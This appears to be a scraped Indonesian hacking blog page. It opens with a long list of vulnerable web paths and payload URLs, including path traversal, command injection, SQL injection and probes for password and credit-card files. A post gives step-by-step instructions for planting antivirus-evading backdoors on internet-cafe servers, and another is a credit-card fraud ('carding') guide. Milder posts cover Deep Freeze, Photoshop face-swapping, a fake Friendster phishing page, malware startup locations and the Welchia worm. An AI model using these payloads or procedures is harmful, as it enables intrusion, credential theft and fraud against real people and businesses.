/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin /admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin /htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STR MVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin /webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htacc ess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Ca rt/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck. log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin /fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_ pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples /config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/---/docs/sourcewindow.cfm
/---/email/getfile.cfm?filename=c:\boot.ini
/---/displayopenedfile.cfm
/---/exprcalc.cfm
/---/openfile.cfm
/---/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin /UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin /ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin /ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin /classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin /files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin /glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin /htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin /iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin /mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin /perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin /pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin /postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin /search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin /textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
*********************************************************************

Selengkapnya.....

Deep Freeze buat Maintenance Software

Written by ferry89 on 01.02

Deep Freeze buat Maintenance Software
Maintenance Harddisk sangat perlu, terutama buat warnet warnet. Deep Freeze berguna buat menjaga agar kondisi software tetap utuh, bisa terhindar dari serangan virus

lebih lanjut...
Install program ini, maka akan berfungsi untuk menjaga kondisi Harddisk yang sudah di set, sehingga harddisk tdk berubah sama sekali ketika dilakukan restart.

Restart komputer sama dengan mengembalikan isi harddisk anda ke keadaan semula (mumet banget nyeritainnya). Jika ada data yang anda ketik kemudian tersimpan, maka ketika restart data tresbut juga akan hilang karena kembali ke keadaan semula.

Namun begitu Deep Freeze menyediakan lokasi dimana kita bisa menyimpan data. Dan kita hanya diperbolehkan menulis data ke tempat yang disediakan.

Kekurangan

JIka kita melakukan penginstalan suatu program dan saat instalasi membutuhkan restart, maka instalasi tersebut tdk akan pernah selesai, karena saat restart komputer kita sudah kembali ke keadaan normal. Untuk mengatasi ini non aktifkan deep freeze - nya baru isntall programnya.

Pengalaman lucu saya dengan deep Freeze yaitu, saat komputer kena virus, terus rencana mau dilakukan cloning dengan kmputer yang lain, ternyata ngak bisa bisa juga. sampai 3 kali cloning, akhirnya saya sadar bhw ada deep freeze.

Pengalaman kedua, saat install printer, setelah install, saya pake, terus capek, matiin komputer, lanjut tugas selanjutnya yaitu nyetak, eeee,,, kok installan printernya hilang ?

gua install lagi, terus dimatiin dan diidupin, kekeek lucu deh,,,

Met mencoba, program ini sangat baik untuk warnet, dan juga untuk teman teman yang ingin agar cookiesnya hilang setelah restart tanpa perlu untuk koreksi - koreksi an

Selengkapnya.....

HACKING WARNET

Written by ferry89 on 00.59

Pertidaktanggungjawaban :
Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem
komputer terutama para operator / SysAdmin dari server warnet, penulis
tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun
bentuknya.

rneTools : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !


CARA : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dipakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (Hati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer server, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa internet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali lagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ..... SELAMAT BUNG !! Anda layak tertawa..... hi....hi...hi....., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu....., list password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x.....tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa "ENCRYPT" sama sekali..

- Having fun..... and stay out of troble ..dan ingat "Junjunglah Etika HACKER", jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server wat...OK :)

Selengkapnya.....

Cara Carding

Written by ferry89 on 00.52

Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan
sebagai bahan referensi untuk tujuan pengetahuan saja. Jika kamu
memutuskan untuk melakukan tindak kejahatan, hal itu diluar tanggung
jawab 'kecoak elektronik'. Informasi bukanlah kejahatan. Mengetahui
cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk
melindungi diri kamu sendiri.

Amankah Kartu Kredit Ini?
=========================


Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu,
semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab

kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah
sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan
negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,
bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun,
kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di
waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap
hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin
ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu
kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan
seperti Jakarta, Medan dan Surabaya.

Bagaimana kartu kredit bisa jatuh ke tangan orang lain.
=======================================================

Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan.
Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari
dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah
untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar.
Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu
kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama
pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di
Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja,
asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam
bulan didepan).
Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di
negara-negara dimana kartu kredit digunakan secara meluas, untuk
mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan
khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa
coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di
Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar
swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon
penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu
kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan,
itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk
menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-).
Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa
mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat
bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat
artikel 'Trashing dan Social Engineering').
Metode mutakhir yang sekarang banyak digunakan di negara-negara maju
adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan
nomor kartu kredit calon korban. Tentu saja jika kamu berhasil
mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa
memanen ratusan bahkan ribuan nomor kartu kredit dari situ.

Sudah dapat kartunya, lalu?
===========================

Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor
kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal
ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis
komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek
detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:

- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka
waktu yang lama
- buka katalog-katalog barang-barang menarik yang diinginkan
- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl
kadaluwarsa, dan biasanya alamat sang empunya kartu).
- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,
kamar hotel), dan minta 'express delivery' (hari berikutnya)
karang alasan seperti: perlu mendadak untuk presentasi lusa, atau
tetek bengek lainnya. gunakan social engineering.
- tunggu kedatangan barangnya.
- ambil barangnya, dan ... CABUT!

Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa
mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu
sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak
akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan
kasus, yang nilainya tidak sampai $50.
Dengan makin maraknya servis internet, semakin banyak pula kriminil yang
men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis.
Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai
pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa
registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya
fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk
mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para
kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi
kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.

Beberapa anggapan
=================


1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang
melihat.
Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan
kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun,
kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar
hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account
internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti
layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan
di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP
kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak
bersedia melayani protokol https:// (secure HTTP). Dial-in server yang
kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo
dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh
gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan
kartu kredit milik orang ada gunanya jika misalnya kamu berhasil
mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah,
itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin
rakyat.

2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.
Biasanya tidak benar. Memang, banyak program-program yang beredar di
internet dan bisa menghasilkan nomor kartu kredit, namun program-program
tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor
kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit
servis di Internet yang melakukan check hanya berdasarkan algoritma ini
saja. Pada umumnya servis-servis komersial menggunakan check berdasar:
Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.

3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com
(atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa
mengakses site tsb sebagai 'member'.
Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur
hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu
meregistrasi/mengorder barang pada malam hari, keesokan harinya sang
perusahaan korban melakukan check, dan menemukan kejanggalan (contoh:
Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain
adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di
'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada
dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu,
account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa
dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur
hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu
kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang
dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.

4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long
Distance.
Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&T, dll
menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh,
atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon
umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal
ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*
menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,
misalnya.

Penutup
=======


Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran
saya kepada kalian yang tertarik untuk menjadi 'professional carder',
hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan
sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu
dulu, deh. Ciao ...

- Belleville, ON

Selengkapnya.....

Trik Mengganti Muka

Written by ferry89 on 23.26

Yang paling menarik dari program Adobe Photoshop, bagi saya ialah merubah atau menganti kepala dan wajah. Makanya, sudah berapa banyak wajah saya, teman, bahkan mantan pacar di rubah. hehe...


Ok. berikut ini cara mengunakan beberapa tool untuk mengedit atau menganti kepala seseorang ( gambar apa saja ) dengan yang lainya.

Tapi sebelum itu, kita namai dulu photo-photo di atas.

1. Jim Morrison = Vokalis bengal asal Londo The Doors
2. Adik angkatnya Richard Gere, kita namai saja Tukul
3. Setelah di edit, hmmm... cocok juga untuk jadi bintang sinetron ya.
kita namai saja Tukul Morrison.
4. Trik ini di khususkan untuk siapa saja yang secara basicli telah menguasai perintah-perintah Adobe Photoshop.

1. Ambil Gambar
Bukalah gambar yang akan di edit. Saya ngambil dua gambar, yakni Jim Morrison yang ingin saya gantikan mukanya dengan Tukul.

2. Pilih gambar atau elemen yang ingin diganti.
Banyak cara untuk menganti gambar atau elemen, namun saya pake trik memulai dari gambar yang akan diganti. dalam hal ini saya mulai dari gambar Jim Morrison. Dengan memakai Tool lasso , yang di gunakan untuk pemilihan muka si Jim Morrison.
a. Klik Tool Lasso.
b. Gambarlah mukanya dengan Tool lasso, maka akan kelihatan titik-titik hitam. lihat gambar

3. Drag - lah atau seret hasil pemilihan dengan Tool lasso tersebut ke mukanya si tukul.

4.Rubahlah ukuran gambar si Tukul ini, biar mukanya masuk pada pemilihan tersebut. dengan cara masuk ke menu Image - > Image Size , atau tekan Alt + Ctrl + I.

5. Setelah di kira-kira pas. tekan Ctrl + D (Deselect). Kemudian kita mulai lagi pemilihan dengan Tool Lasso, di mukanya si Tukul.hasilnya seperti gambar di bawah ini.

6. Balik lagi seperti cara no 3. Namun sekarang Drag atau seret kembali pemilihan di mukanya si tukul tersebut ke gambarnya si Jim Morrison. Dengan cara seret sambil menekan tombol Ctrl. hasilnya akan seperti gambar di bawah.

Kalau hasil gambarnya terlalu besar atau kecil gunakanlah Free Transform, dengan cara masuk ke menu Edit - > Free Transform.
8. Add Layer Mask
Setelah merasa proposional antara muka si Jim Morrison dan muka tempelan si Tukul. kini kita main di layer, yakni menambah Mask Layer. Dengan cara tekan tombol Add Layer Mask.

Sebelum di tambah Mask

Setelah di tambah Mask

9. Tool Brush dan warna default Hitam - Putih
Klik Brush Tool dan klik tombol D, agar warna default foreground dan background Hitam - Putih.



10. Menyapu gambar tempelan yang overlap.
Gunakan Tool Brush untuk mengoreksi gambar yang overlap, dalam kasus ini saya mengoreksi gambar si Tukul yang overlap dan yang saya anggap tidak perlu. ( antara jidat, leher dan sekitar pingir).

12. Menyamakan warna kulit kedua gambar.
Untuk meyamakan warna kulit antara si Jim dan si Tukul, pertama-tama pilihlah photo si tukul ( lihat gambar ). kemudian saya mengunakan Image - > Adjust -> Hue / Saturation. tandai Colorize dan Preview.



13. Walaupun setengah matang tapi lumayan jek.

14. Tambah Bumbu.


Selengkapnya.....

Friendster Palsu

Written by ferry89 on 23.23

Beberapa hari belakangan ini profile di Friendster saya tidak bisa dibuka. Apabila mengakses profile saya di FS, maka akan muncul halaman login seakan terjadi error pada FS dan meminta anda login kembali. Berikut tampilannya :

Apabila diperhatikan, alamat situs itu bukan http://www.friendster.com, melainkan http://www.friendster.co.nr! Mungkin bagi kebanyakan pengguna akan serta merta memasukkan email dan passwordnya. Tapi setelah saya liat2.. ternyata itu adalah situs Friendster Palsu! Halaman itu bertujuan untuk mengambil email dan password kita dan mengirimkannya ke tempat lain menggunakan script PHP dari alamat “http://209.190.16.82/bh.php” (bisa dilihat pada source code HTML-nya).

Setelah saya teliti.. ternyata hal ini bisa terjadi akibat testimonial yang menggunakan flash atau sejenisnya (saya lupa.. soalnya udah diapus) yang bisa me-redirect halaman profile kita ke alamat lain. Misalnya yang tadinya ingin membuka alamat http://www.friendster.com/chaidirabadi akan di-redirect menjadi http://www.friendster.co.nr.

Setelah saya cek menggunakan ARIN WHOIS, IP 209.190.16.82 (IP dari script yg digunakan) menghasilkan informasi berikut :

Search results for: 209.190.16.82

OrgName: Columbus Network Access Point, Inc.
OrgID: CNAP
Address: 50 W, Broad St, Suite 627
City: Columbus
StateProv: OH
PostalCode: 43215
Country: US

Sedangkan friendster.com memiliki IP 209.11.168.242 dengan informasi berikut :

Search results for: 209.11.168.242

OrgName: Globix Corporation
OrgID: GLBX
Address: 139 Centre Street
City: New York
StateProv: NY
PostalCode: 10013
Country: US

Jadi sangat jelas bahwa script PHP itu BUKAN script dari Friendster.

Untuk itu.. saya menghimbau kepada temen2 yang sudah pernah memasukkan email dan password melalui halaman Friendster Palsu untuk SEGERA mengganti password. Sedangkan bagi yang belum pernah.. berhati-hatilah. Dan jangan lupa.. bagi yang mengkases Friendster melalui tempat umum (warnet atau lab), ada baiknya untuk menghapus cookies pada browser terlebih dahulu.

*Thx to fira for ur help me to recognize this problem. :-D

Selengkapnya.....

TEMPAT VIRUS DAN TROJAN BERSEMBUNYI DALAM START UP

Written by ferry89 on 23.20

Mungkin Informasi ini sedikit tidak penting bagi para hacker tp penting bagi para personal
yg selalu disibukan dengan virus dan trojan , disini saya akan sedikit membahas tentang
tempat persembunyian dari virus daan trojan itu . Tempat-tempat tersebut antara lain :

1. START-UP FOLDER
Windows akan membuka semua items yang ada di start Menu Start Up Folder . Untuk
contohnya silakan anda menaruh text apa dari notepad di start up Menu , maka windows
akan menjalankannya ketika start .
2. REGISTRY
Windows akan menjalankan semua instruksi yaang ada di " Run ",untuk mengetahui
program2 yang dijalankan windows , masuk ke regedit
-> HKLM\Software\Windows\Microsoft\CurrentVersion\Run
-> HKLM\Software\Windows\Microsoft\CurrentVersion\RunServices
-> HKLM\Software\Windows\Microsoft\CurrentVersion\RunOnce
-> HKLM\Software\Windows\Microsoft\CurrentVersion\RunServicesOnce
.
3. REGISTRY
selain diatas ada kemungkinan virus dan trojan menyembunyikan dirinya di
: HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*atau kemungkinan2 yg lain :
[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*"
Dalam keadaan default key \"%1\" %*" dan apabila diganti "\"xxx.exe %1\" %*"
kemungkinan dari itu adalah virus atau trojan
4. BATCH FILE
Batch file merupakan file batch dana windows akan menjalankan file2 yang terdapat
pada batch file , untuk windows 9x bernama autoexec.bat dan untuk windowsNT berada
di Winnt\WINSTART.BAT .
5. INITIALIZATION FILE
Windows menjalankan perintah-perintah yang ada di "RUN= " dalam file win.ini untuk
win9x dan winnt
Selain "Run=" ada juga di " LOAD=" pada win.ini
"load=" ada didalam shell syetem.ini untuk win9x letaknya di c:\>windows\system.
ini dan pada perintah
[boot]
shell=explorer.exe C:\windows\filename
6. TIPE C:\EXPLORER.EXE
C:\Explorer.exe
Windows akan menjalankan explorer.exe pada setiap memulai start ,
apa bila explorer.exe coruprt ada kemungkinan explorer.exe terkena virus atau
trojan dan akan mereboot komputer . selain tempat2 persembunyian virus
dan trojan diatas ada kemungkinan mereka terdapat dalam tempat yang sama sekali
tidak terditeksi ,sebagai contoh pada trojan Trojan SubSeven 2.2.dia
menyembunyikan dirinya di :

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders

Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
Key teserabut menjalankan secara khusus apaliasi icq net.

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object"
"NeverShowExt"=""

Bacaan/Referensi : -> viruslist.com
-> symantec.com

Selengkapnya.....

W32.Welchia.Worm

Written by ferry89 on 23.18

W32.Welchia.Worm adalah worm yang mampu mengeksplotasi berbagai kebocoran
(vulnerabilities), termasuk diantaranya:
- DCOM RPC vulnerability ..
(sebagimana di jelaskan dalam buletin keamanan Microsoft MS03-026)
yang menggunakan tcp port 135,menyerang secara spesifik kepada Windows XP
- Webdav vulnerability (sebagimana di jelaskan dalam buletin keamanan
Microsoft MS03-007) yang menggunakan tcp port 80., menyerang Mesin yang
menjalankan IIS 5.0, dan akan berdampak padawindows 2000 system,dan NT/XP.

dikenal juga dengan nama:
W32/Welchia.worm10240 [AhnLab], W32/Nachi.worm [McAfee],
WORM_MSBLAST.D [Trend], Lovsan.D [F-Secure],W32/Nachi-A [Sophos],
Win32.Nachi.A [CA], Worm.Win32.Welchia [KAV]

Tipe: Worm
Panjang infeksi : 10,240 bytes
Systems yang dapat di infeksi:Microsoft IIS, Windows 2000, Windows XP
Systems yang tidak terinfeksi:Linux, Macintosh, OS/2, UNIX, Windows 3.x,
Windows 95, Windows 98, Windows Me, Windows NT

Port yang digunakan: TCP 135(RPC DCOM), TCP 80(WebDav)

saat W32.Welchia.Worm di eksekusi, maka akan melakukan:

mengkopikan dirinya ke:
%System%\Wins\Dllhost.exe
catatan %Sytem% adalah variabel, worm akan mencari folder file system dan
